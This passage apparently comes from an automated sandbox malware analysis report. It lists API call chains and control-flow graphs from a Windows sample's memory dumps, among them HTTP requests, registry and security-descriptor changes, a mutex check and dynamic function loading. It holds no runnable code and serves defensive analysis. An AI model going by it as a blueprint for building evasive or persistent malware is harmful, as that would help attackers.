                  • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001788DC
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 00178900
                  • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 0017891D
                  • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 0017893A
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 540 17d796-1835ae call 1771d1 call 183914 GetStartupInfoW 546 1835b3-1835be InterlockedCompareExchange 540->546 547 1835d9-1835db 546->547 548 1835c0-1835c2 546->548 549 1835dc-1835e3 547->549 550 1835cc-1835d7 Sleep 548->550 551 1835c4-1835ca 548->551 552 1835ef-1835f6 549->552 553 1835e5-1835ed _amsg_exit 549->553 550->546 551->549 555 1835f8-183608 call 181d29 552->555 556 183618 552->556 554 18361e-183625 553->554 558 183627-183638 _initterm 554->558 559 183642-183645 554->559 560 18360d-183611 555->560 556->554 558->559 561 183647-183649 InterlockedExchange 559->561 562 18364f-183655 559->562 560->554 563 183613 560->563 561->562 564 183670-183677 562->564 565 183657-183664 call 173e40 562->565 566 183742-183749 563->566 564->566 567 18367d 564->567 565->564 574 183666-183669 565->574 571 18374e-183753 call 183959 566->571 569 18367f-183689 567->569 572 1836da-1836de 569->572 573 18368b-18368e 569->573 578 1836eb-1836ed 572->578 579 1836e0-1836e8 572->579 576 183695-18369b 573->576 577 183690-183693 573->577 574->564 581 18369d-1836a1 576->581 582 1836aa-1836ae 576->582 577->572 577->576 578->569 579->578 581->582 583 1836a3-1836a8 581->583 584 1836b6-1836b8 582->584 585 1836b0-1836b4 582->585 583->576 586 1836b9-1836c1 call 17fe30 584->586 585->586 588 1836c6-1836d1 586->588 589 18371f-183725 588->589 590 1836d3-1836d4 exit 588->590 591 183727 _cexit 589->591 592 18372d-183739 589->592 590->572 591->592 592->571
                  APIs
                    • Part of subcall function 001771D1: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177208
                    • Part of subcall function 001771D1: GetCurrentProcessId.KERNEL32 ref: 00177214
                    • Part of subcall function 001771D1: GetCurrentThreadId.KERNEL32 ref: 0017721C
                    • Part of subcall function 001771D1: GetTickCount.KERNEL32 ref: 00177224
                    • Part of subcall function 001771D1: QueryPerformanceCounter.KERNEL32(?), ref: 00177230
                  • GetStartupInfoW.KERNEL32(?,001871B0,0000005C), ref: 0018358E
                  • InterlockedCompareExchange.KERNEL32(00188880,?,00000000), ref: 001835B6
                  • Sleep.KERNEL32(000003E8), ref: 001835D1
                  • _amsg_exit.MSVCRT ref: 001835E7
                  • __initterm_e.LIBCMT ref: 00183608
                  • _initterm.MSVCRT ref: 00183631
                  • InterlockedExchange.KERNEL32(00188880,00000000), ref: 00183649
                    • Part of subcall function 0017FE30: Sleep.KERNELBASE(00000001), ref: 0017FE80
                    • Part of subcall function 0017FE30: SetCurrentDirectoryW.KERNELBASE(?), ref: 0017FEF3
                    • Part of subcall function 0017FE30: srand.MSVCRT ref: 0017FF04
                    • Part of subcall function 0017FE30: GetCurrentProcess.KERNEL32(?), ref: 0017FF44
                    • Part of subcall function 0017FE30: IsWow64Process.KERNELBASE(00000000), ref: 0017FF4B
                    • Part of subcall function 0017FE30: ??2@YAPAXI@Z.MSVCRT ref: 0017FF74
                    • Part of subcall function 0017FE30: ??3@YAXPAX@Z.MSVCRT ref: 0017FFB1
                    • Part of subcall function 0017FE30: ??2@YAPAXI@Z.MSVCRT ref: 00180004
                    • Part of subcall function 0017FE30: CreateThread.KERNEL32(00000000,00000000,00182A70,?,00000000,?,?,?,?), ref: 001800FA
                    • Part of subcall function 0017FE30: _time64.MSVCRT ref: 0018014D
                    • Part of subcall function 0017FE30: _time64.MSVCRT ref: 00180338
                    • Part of subcall function 0017FE30: _time64.MSVCRT ref: 001804B4
                    • Part of subcall function 0017FE30: ExitProcess.KERNEL32 ref: 00180706
                  • exit.MSVCRT ref: 001836D4
                  • _cexit.MSVCRT ref: 00183727
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 593 175c50-175c85 594 175c87-175caa 593->594 595 175ce8-175d0c 593->595 598 175cb0-175cbf 594->598 599 175f72-175f77 594->599 595->599 606 175d12-175d35 595->606 600 175cc2-175cdf LookupAccountSidW 598->600 602 175f79-175f7f call 17bc60 599->602 603 175f82-175f87 599->603 604 175ce1-175ce7 600->604 605 175d55-175d5a 600->605 602->603 608 175f97-175f9c 603->608 609 175f89-175f8f 603->609 613 175d5c-175d61 605->613 614 175db7-175dba 605->614 606->599 621 175d3b-175d50 606->621 611 175f9e-175fa5 608->611 612 175fad-175fb5 608->612 609->608 611->612 613->614 618 175d63-175db3 call 181f60 memcpy * 2 613->618 615 175dc0 614->615 616 175dbc-175dbe 614->616 620 175dc2-175df9 call 171cc0 call 181f60 call 1791c0 * 2 615->620 616->620 618->614 631 175e2f-175e72 call 1791c0 * 2 _time64 _localtime64 call 1791c0 620->631 632 175dfb-175e11 call 1791c0 620->632 621->600 644 175e77-175e9e wcsftime 631->644 637 175e24-175e2c call 1791c0 632->637 638 175e13-175e22 632->638 637->631 638->637 638->638 645 175eb4-175ecd call 1791c0 644->645 646 175ea0 644->646 650 175ee1-175ee5 645->650 651 175ecf 645->651 647 175ea3-175eb2 646->647 647->645 647->647 653 175f1f-175f3f call 1791c0 call 178030 650->653 654 175ee7-175efd call 1791c0 650->654 652 175ed0-175edf 651->652 652->650 652->652 665 175f52-175f70 call 1791c0 call 17bc60 653->665 666 175f41-175f50 653->666 659 175eff 654->659 660 175f11-175f1c call 1791c0 654->660 664 175f00-175f0f 659->664 660->653 664->660 664->664 665->599 666->665 666->666
                  APIs
                  • LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00175CDB
                  • memcpy.MSVCRT ref: 00175D81
                  • memcpy.MSVCRT ref: 00175DA6
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • _time64.MSVCRT ref: 00175E4C
                  • _localtime64.MSVCRT ref: 00175E5D
                  • wcsftime.MSVCRT ref: 00175E87
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(?), ref: 00181F87
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                  • GetProcessHeap.KERNEL32 ref: 00182015
                  • RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                  • RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 810 182870-182885 811 182887 810->811 812 18288c-1828bc StrChrW RegOpenKeyExW 810->812 811->812 813 1829b2-1829b7 812->813 814 1828c2-1828e3 GetSecurityInfo 812->814 815 18299e-1829b0 814->815 816 1828e9-182925 call 1780b0 StrChrW RegOpenKeyExW 814->816 815->813 820 182948-182968 SetNamedSecurityInfoW 816->820 821 182927-182946 RegSetValueExW 816->821 822 18296a-18298a 820->822 823 18298c-18299b 820->823 821->820 822->823 823->815
                  APIs
                  • StrChrW.SHLWAPI(?,0000005C), ref: 001828A3
                  • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001828B8
                  • GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001828DD
                    • Part of subcall function 001780B0: memset.MSVCRT ref: 00178138
                    • Part of subcall function 001780B0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001781B5
                  • StrChrW.SHLWAPI(?,0000005C), ref: 00182906
                  • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 00182921
                  • RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 00182946
                  • SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 00182962
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 825 176a70-176a90 ??2@YAPAXI@Z 826 176a9d 825->826 827 176a92-176a9b call 177150 825->827 829 176a9f-176aab ??2@YAPAXI@Z 826->829 827->829 831 176aad-176ab9 call 177150 829->831 832 176abb-176abe 829->832 833 176ac0-176aea call 1791c0 call 173d50 831->833 832->833 840 176aec-176b09 call 1791c0 call 173d50 833->840 841 176b19-176b1e 833->841 853 176b0e-176b13 840->853 843 176b24-176b2a 841->843 844 176bf9-176c23 call 1791c0 call 17f7d0 841->844 843->844 847 176b30-176b38 843->847 868 176c3c-176c3e 844->868 869 176c25-176c33 call 179150 844->869 849 176bbc-176bd0 call 17bed0 847->849 850 176b3e-176b43 847->850 865 176bed-176bf5 849->865 866 176bd2-176bd4 849->866 855 176b45-176b4c 850->855 856 176b8a 850->856 853->841 859 176ba4-176ba6 853->859 861 176b4e 855->861 862 176b6d-176b7c call 179150 855->862 858 176b8d-176ba0 call 17bc60 856->858 887 176ba2 858->887 888 176bf7 858->888 870 176bb8-176bba 859->870 871 176ba8-176bb5 call 17ccf0 ??3@YAXPAX@Z 859->871 863 176b50-176b68 861->863 882 176cd2-176cdd 862->882 883 176b82-176b85 862->883 863->863 874 176b6a 863->874 865->858 876 176be6-176beb 866->876 877 176bd6-176be3 call 17ccf0 ??3@YAXPAX@Z 866->877 872 176c40-176c4d call 17ccf0 ??3@YAXPAX@Z 868->872 873 176c50-176c53 868->873 881 176c38-176c3a 869->881 870->844 871->870 872->873 884 176c55-176c57 873->884 874->862 876->858 877->876 881->868 881->884 883->856 892 176c59-176c5b 884->892 893 176c7b-176c7d 884->893 887->859 888->844 894 176c5d-176c63 892->894 895 176c65-176c6f 892->895 896 176c7f-176c8c 893->896 897 176c8d-176c97 893->897 894->895 894->897 898 176ca9-176cb6 call 172230 895->898 900 176c71-176c79 call 17ccf0 895->900 897->898 899 176c99-176ca0 call 17ccf0 897->899 898->882 908 176cb8-176cbf 898->908 907 176ca1-176ca6 ??3@YAXPAX@Z 899->907 900->907 907->898 908->882 909 176cc1 908->909 910 176cc6-176cca 909->910 911 176cde-176ce0 910->911 912 176ccc-176cd0 910->912 911->882 913 176ce2-176d0c call 1791c0 call 171ad0 911->913 912->882 912->910 917 176d11-176d1f 913->917
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 00176A86
                  • ??2@YAPAXI@Z.MSVCRT ref: 00176AA1
                    • Part of subcall function 00173D50: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,001816E1,?,00171C1A,?), ref: 00173D7E
                    • Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173D9B
                    • Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173DB0
                    • Part of subcall function 00173D50: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00173DE8
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • ??3@YAXPAX@Z.MSVCRT ref: 00176BB0
                  • ??3@YAXPAX@Z.MSVCRT ref: 00176BDE
                  • ??3@YAXPAX@Z.MSVCRT ref: 00176C48
                  • ??3@YAXPAX@Z.MSVCRT ref: 00176CA1
                    • Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                    • Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                    • Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 918 17fe58-17fe5f 919 17fe60-17fe85 Sleep 918->919 921 17fe87-17ff19 SetCurrentDirectoryW srand call 17eda0 call 17bc10 919->921 930 17ff1f-17ff29 call 1735e0 921->930 931 1805f5-1805fb 921->931 937 17ff3d-17ff53 GetCurrentProcess IsWow64Process 930->937 938 17ff2b-17ff38 call 182bc0 call 17cab0 930->938 933 1806fb-180706 call 1795a0 call 177e10 ExitProcess 931->933 934 180601-18064b call 178030 call 181f60 931->934 959 1806a5-1806f9 call 17bc60 934->959 960 18064d-180657 934->960 941 17ff55-17ff65 call 17ea40 937->941 942 17ff68-17ff7e call 182f00 ??2@YAPAXI@Z 937->942 938->931 941->942 956 17ff8b 942->956 957 17ff80-17ff89 call 17eac0 942->957 962 17ff8d-17ff96 call 173e30 956->962 957->962 959->933 963 180660-180668 960->963 973 17ff98-17ffa0 call 17cab0 962->973 974 17ffa5-17ffa7 962->974 966 18066a-180670 963->966 967 180680-180682 963->967 966->967 970 180672-18067c 966->970 971 18068c-180693 967->971 972 180684-180687 967->972 970->963 978 18067e 970->978 979 180695-1806a0 971->979 980 1806a3 971->980 972->971 973->931 975 17ffb9-18000e call 171b70 call 17bc50 ??2@YAPAXI@Z 974->975 976 17ffa9-17ffb6 call 172500 ??3@YAXPAX@Z 974->976 993 18001f 975->993 994 180010-18001d call 177150 975->994 976->975 978->972 979->980 980->959 995 180025-180072 call 1791c0 call 17f7d0 call 171f50 call 176a70 993->995 994->995 1006 180094-1800b4 call 180ce0 995->1006 1007 180074-18008f call 171750 call 17fad0 call 17cab0 995->1007 1006->1007 1012 1800b6-1800ff call 175780 CreateThread 1006->1012 1007->931 1018 180100-180111 1012->1018 1020 1805c0-1805d3 call 182ad0 1018->1020 1021 180117-180132 call 1795f0 1018->1021 1020->1018 1026 18014c-180175 _time64 1021->1026 1027 180134-180147 1021->1027 1028 1801e3-1801fe call 181d50 1026->1028 1029 180177 1026->1029 1035 1805a4-1805ba 1027->1035 1038 18022d-180246 1028->1038 1039 180200-180203 1028->1039 1032 180180-180199 call 17da20 1029->1032 1033 180179-18017e 1029->1033 1040 1801c7-1801df 1032->1040 1041 18019b-18019e 1032->1041 1033->1028 1033->1032 1035->1020 1035->1021 1042 180248 1038->1042 1043 180275-180290 call 174380 call 1814c0 1038->1043 1044 180215-180228 1039->1044 1045 180205-180212 call 17c980 1039->1045 1040->1028 1049 1801b0-1801c2 1041->1049 1050 1801a0-1801ad call 17c980 1041->1050 1047 18024a-18024f 1042->1047 1048 180251-180269 call 17adb0 1042->1048 1064 180292-1802c3 call 1791c0 * 2 1043->1064 1065 1802c5 1043->1065 1044->1035 1045->1044 1047->1043 1047->1048 1048->1035 1062 18026f-180272 1048->1062 1063 1805a2 1049->1063 1050->1049 1062->1043 1063->1035 1078 18032b-180333 call 175a90 1064->1078 1067 1802c7-1802f8 call 1791c0 * 2 1065->1067 1068 1802fa-18032a call 1791c0 * 2 1065->1068 1067->1078 1068->1078 1083 180336-18034d _time64 1078->1083 1084 18034f-18035c 1083->1084 1085 180367-180398 call 1737c0 1083->1085 1087 18035e 1084->1087 1088 18039f-1803ac 1084->1088 1085->1088 1095 18039a 1085->1095 1087->1085 1092 180360-180365 1087->1092 1089 180407-180410 1088->1089 1090 1803ae 1088->1090 1096 180416 1089->1096 1097 1804c3-1804d0 call 1799a0 1089->1097 1093 1803b7-1803d4 1090->1093 1094 1803b0-1803b5 1090->1094 1092->1085 1092->1088 1093->1089 1101 1803d6 1093->1101 1094->1089 1094->1093 1095->1088 1099 180424-18043e call 17f550 call 179ab0 1096->1099 1100 180418-18041e 1096->1100 1097->1063 1106 1804d6-1804e9 call 175a90 1097->1106 1115 180440-180471 call 1791c0 * 2 1099->1115 1116 180473-1804a3 call 1791c0 * 2 1099->1116 1100->1097 1100->1099 1104 1803d8-1803dd 1101->1104 1105 1803df-180401 call 172030 1101->1105 1104->1089 1104->1105 1105->1089 1113 180574-18058b call 180ce0 1105->1113 1106->1063 1118 1804ef-180500 call 177560 1106->1118 1126 18058d-180597 1113->1126 1127 1805d8-1805f3 call 171750 call 17fad0 call 17cab0 1113->1127 1140 1804a4-1804c0 call 175a90 call 17bc60 _time64 1115->1140 1116->1140 1129 180599-1805a0 1118->1129 1130 180506-18050d 1118->1130 1126->1063 1127->931 1129->1063 1129->1127 1130->1127 1135 180513-18051f 1130->1135 1138 180521-18052e 1135->1138 1139 180530-180535 1135->1139 1142 180537-18053b 1138->1142 1139->1142 1143 180540-180548 1139->1143 1140->1097 1142->1143 1145 180562-18056c 1143->1145 1146 18054a-180560 1143->1146 1145->1083 1149 180572 1145->1149 1146->1143 1146->1145 1149->1063
                  APIs
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176386
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 0017639E
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764AC
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B2
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B8
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 001764F9
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176517
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176538
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017660F
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 00176618
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017661E
                    • Part of subcall function 00171B70: memset.MSVCRT ref: 00171BA3
                    • Part of subcall function 00171B70: memset.MSVCRT ref: 00171BB2
                    • Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BC9
                    • Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BE8
                    • Part of subcall function 00171F50: memcpy.MSVCRT ref: 00171FEC
                    • Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176A86
                    • Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176AA1
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BB0
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BDE
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176C48
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176CA1
                    • Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FB8D
                    • Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FBA4
                    • Part of subcall function 00175780: ??2@YAPAXI@Z.MSVCRT ref: 001757D5
                    • Part of subcall function 00175780: ??3@YAXPAX@Z.MSVCRT ref: 0017582F
                    • Part of subcall function 0017DA20: ??2@YAPAXI@Z.MSVCRT ref: 0017DA7A
                    • Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DAB9
                    • Part of subcall function 0017DA20: _time64.MSVCRT ref: 0017DADB
                    • Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DB0B
                    • Part of subcall function 00181D50: ??2@YAPAXI@Z.MSVCRT ref: 00181D7F
                    • Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181DBE
                    • Part of subcall function 00181D50: _time64.MSVCRT ref: 00181DE0
                    • Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181E0D
                    • Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017ADEF
                    • Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017AF9A
                    • Part of subcall function 001814C0: WSAStartup.WS2_32(00000202,?), ref: 001814E2
                    • Part of subcall function 001814C0: gethostname.WS2_32(?,000000FF), ref: 00181502
                    • Part of subcall function 001814C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 00181522
                    • Part of subcall function 001814C0: freeaddrinfo.WS2_32(00000000), ref: 00181580
                    • Part of subcall function 001814C0: WSACleanup.WS2_32 ref: 00181586
                    • Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                    • Part of subcall function 001737C0: memcpy.MSVCRT ref: 00173CA0
                    • Part of subcall function 00172030: ??2@YAPAXI@Z.MSVCRT ref: 0017207A
                    • Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 00172176
                    • Part of subcall function 00172030: _time64.MSVCRT ref: 001721A8
                    • Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 001721CF
                    • Part of subcall function 00179AB0: WSAStartup.WS2_32(00000202,?), ref: 00179ADA
                    • Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000,0018043A), ref: 00179B3B
                    • Part of subcall function 00179AB0: getaddrinfo.WS2_32(0018043A,00000000,?,00000000), ref: 00179BD6
                    • Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000), ref: 00179C1E
                    • Part of subcall function 00179AB0: WSACleanup.WS2_32 ref: 00179C44
                    • Part of subcall function 00182AD0: ??2@YAPAXI@Z.MSVCRT ref: 00182ADD
                    • Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182B54
                    • Part of subcall function 00182AD0: _time64.MSVCRT ref: 00182B82
                    • Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182BAA
                    • Part of subcall function 0017EAC0: CoCreateInstance.OLE32(0018708C,00000000,00000001,00186E7C,00000004,00188880,000003E7,0017FF87), ref: 0017EB17
                    • Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C56
                    • Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C90
                    • Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182CDB
                    • Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D75
                    • Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D8A
                    • Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D9E
                  • Sleep.KERNELBASE(00000001), ref: 0017FE80
                  • SetCurrentDirectoryW.KERNELBASE(?), ref: 0017FEF3
                  • srand.MSVCRT ref: 0017FF04
                    • Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EDF2
                    • Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EE19
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE47
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE6F
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE97
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EEBF
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E30000,?), ref: 0017EEE7
                    • Part of subcall function 0017BC10: CoInitializeEx.OLE32(00000000,00000000), ref: 0017BC14
                    • Part of subcall function 0017BC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0017BC33
                  • GetCurrentProcess.KERNEL32(?), ref: 0017FF44
                  • IsWow64Process.KERNELBASE(00000000), ref: 0017FF4B
                  • ??2@YAPAXI@Z.MSVCRT ref: 0017FF74
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017FFB1
                  • ??2@YAPAXI@Z.MSVCRT ref: 00180004
                  • CreateThread.KERNEL32(00000000,00000000,00182A70,?,00000000,?,?,?,?), ref: 001800FA
                  • _time64.MSVCRT ref: 0018014D
                  • _time64.MSVCRT ref: 00180338
                  • _time64.MSVCRT ref: 001804B4
                    • Part of subcall function 0017C980: _itow.MSVCRT ref: 0017C999
                  • ExitProcess.KERNEL32 ref: 00180706
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 001735E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 0017366B
                    • Part of subcall function 001735E0: ExitProcess.KERNEL32 ref: 0017368E
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
